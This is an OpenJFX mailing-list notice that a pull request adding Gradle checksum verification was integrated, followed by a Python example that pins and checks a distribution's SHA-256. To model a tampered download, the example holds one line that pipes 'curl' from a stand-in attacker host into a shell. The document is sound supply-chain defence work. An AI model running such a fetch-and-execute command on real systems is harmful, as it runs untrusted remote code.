[prev in list] [next in list] [prev in thread] [next in thread] 

List:       openjdk-openjfx-dev
Subject:    Integrated: 8262236: Configure Gradle checksum verification
From:       John Neffenger <github.com+1413266+jgneff () openjdk ! java ! net>
Date:       2021-02-23 19:38:40
Message-ID: rYyeyGuOiRPp3tKBpm_AZUj85ozQl5-9ertM2syE2-o=.766e1d69-3424-4a8c-a07d-46d3059cac3b () github ! com

On Tue, 23 Feb 2021 17:25:47 GMT, John Neffenger <github.com+1413266+jgneff@openjdk.org> wrote:

> The recent supply-chain attacks in the news are making me nervous! 😟
> 
> The Gradle 6.3 distribution is the only software on my OpenJFX build system that doesn't come from an Ubuntu package or a GitHub repository. Ubuntu uses digital signatures to authenticate each package, and Git uses a secure hash algorithm to ensure the integrity of each file, but there is no such check of the Gradle distribution before running it. During my OpenJFX builds, Gradle is downloaded from a Cloudflare server through an HTTPS proxy server, and there's no guarantee that it's the same file as the one published by the Gradle developers.
> 
> This pull request adds the additional step of verifying the Gradle distribution on the build system before extracting its archive and running it.
> 
> We might also consider adding the [Gradle Wrapper Validation](https://github.com/marketplace/actions/gradle-wrapper-validation) GitHub Action to the OpenJFX repository.

This pull request has now been integrated.

Changeset: dc342d33
Author:    John Neffenger <john@status6.com>
Committer: Kevin Rushforth <kcr@openjdk.org>
URL:       https://git.openjdk.java.net/jfx/commit/dc342d33
Stats:     1 line in 1 file changed: 1 ins; 0 del; 0 mod

8262236: Configure Gradle checksum verification

Reviewed-by: kcr

-------------

PR: https://git.openjdk.java.net/jfx/pull/411
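The message above does not show the one-line change itself, so the following is an added illustration of the verification step, not the project's code. It models the mechanism the Gradle wrapper provides: an optional `distributionSha256Sum` property in `gradle/wrapper/gradle-wrapper.properties`, which makes the wrapper refuse a downloaded distribution whose SHA-256 does not match before it is unpacked. The properties text, the stand-in archive, its tampered variant and the function names are all constructed for this example; for a real release the pinned value must come from the checksum list Gradle publishes for that version, never from the file that was just downloaded.

```python
"""Verify a downloaded Gradle distribution against the SHA-256 pinned in
gradle-wrapper.properties, and refuse to extract it on any mismatch.

Added example; not part of the OpenJFX change. Archive contents, hashes and
property values are constructed for illustration."""
import hashlib
import hmac
from io import BytesIO
from zipfile import ZipFile, ZipInfo

# Weak configuration (constructed): no checksum, so the wrapper downloads and
# runs whatever the server, a proxy, or anything in between hands back.
WEAK_PROPERTIES = """\
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
distributionUrl=https\\://services.gradle.org/distributions/gradle-6.3-bin.zip
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
"""


def hardened_properties(sha256_hex: str) -> str:
    """Same file with the checksum pinned; the real wrapper checks this property itself."""
    return WEAK_PROPERTIES + f"distributionSha256Sum={sha256_hex}\n"


def parse_wrapper_properties(text: str) -> dict:
    """Minimal Java .properties reader: key=value lines, '#'/'!' comments,
    and the backslash-escaped ':' that gradle-wrapper.properties uses in URLs."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        props[key.strip()] = value.strip().replace("\\:", ":")
    return props


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_distribution(archive: bytes, props: dict) -> tuple:
    """Return (ok, reason). Missing pin is treated as a failure, not a pass."""
    expected = props.get("distributionSha256Sum")
    if expected is None:
        return False, "no distributionSha256Sum configured; refusing unverified download"
    actual = sha256_hex(archive)
    # Constant-time compare: cheap here, and the habit avoids timing leaks elsewhere.
    if not hmac.compare_digest(actual, expected.strip().lower()):
        return False, f"checksum mismatch: expected {expected}, got {actual}"
    return True, "ok"


def names_if_verified(archive: bytes, props: dict) -> list:
    """Open the archive only after the checksum passes; a failure raises before any unzip."""
    ok, reason = verify_distribution(archive, props)
    if not ok:
        raise RuntimeError(reason)
    with ZipFile(BytesIO(archive)) as zf:
        return zf.namelist()


def build_fake_distribution(payload: bytes = b"#!/bin/sh\necho gradle\n") -> bytes:
    """Constructed stand-in for gradle-6.3-bin.zip: a tiny deterministic zip,
    not a real Gradle build. A different payload models a tampered download."""
    buf = BytesIO()
    with ZipFile(buf, "w") as zf:
        info = ZipInfo("gradle-6.3/bin/gradle", date_time=(2020, 3, 24, 0, 0, 0))
        zf.writestr(info, payload)
    return buf.getvalue()


if __name__ == "__main__":
    genuine = build_fake_distribution()
    pinned = parse_wrapper_properties(hardened_properties(sha256_hex(genuine)))
    unpinned = parse_wrapper_properties(WEAK_PROPERTIES)
    print("genuine, pinned:  ", verify_distribution(genuine, pinned))
    print("genuine, unpinned:", verify_distribution(genuine, unpinned))
    tampered = build_fake_distribution(b"#!/bin/sh\ncurl https://attacker.example/x | sh\n")
    print("tampered, pinned: ", verify_distribution(tampered, pinned))
```

The pin only buys integrity relative to the value you recorded: a hash fetched over the same channel as the archive proves nothing, so copy it from Gradle's published checksum list and commit it alongside the URL. It also covers only the distribution zip; the wrapper jar that performs the download is a separate artifact, which is what the Gradle Wrapper Validation action mentioned in the message is for.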


